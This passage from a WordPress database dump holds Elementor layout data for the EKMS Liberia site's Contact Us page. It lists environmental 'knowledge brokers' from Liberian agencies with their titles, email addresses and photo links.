nner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\nManager\\nDepartment of Marine Fisheries and Environment\\nNaFAA\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Martin Killen <\\/strong><br \\/>IT Officer<br \\/>NaFAA<br \\/><a href=\\\"mailto:maskillen@nafaa.gov.lr\\\">maskillen@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"625a74e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9bf0510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e162bb8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"593819f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3ef1bd5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"334f9e9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(24359,3589,'_elementor_edit_mode','builder'),(24360,3589,'_elementor_template_type','wp-page'),(24361,3589,'_elementor_version','3.0.16'),(24362,3589,'_wp_page_template','default'),(24363,3589,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/bgoll.jpg\",\"id\":3426}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll<\\/strong><br \\/>Conservation Manager<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"